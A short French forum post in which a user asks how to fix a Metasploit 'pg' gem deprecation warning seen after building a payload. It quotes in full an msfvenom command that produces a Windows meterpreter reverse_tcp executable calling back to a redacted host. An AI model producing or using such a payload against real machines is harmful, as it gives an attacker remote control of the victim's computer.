Probleme apres utilisation de msfvenom

Bonjour, apres avoir configuré mon payload en utilisant la commande suivante :

`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=4444 -f exe > reverse.exe`

jobtient donc mon fichier reverse.exe

mais en faisant cat reverse.exe je recois comme message en tete daffiche :


The pg and/or activerecord gem version has changed, meaning deprecated pg constants
may no longer be in use, so try deleting this file to see if the
‘The PGconn, PGresult, and PGError constants are deprecated…’ message has gone:
/usr/share/metasploit-framework/lib/pg/deprecated_constants.rb

et je ne sais pas le meilleur moyen de regler ce probleme

Merci beaucoup a ceux qui vont maider ! :slight_smile: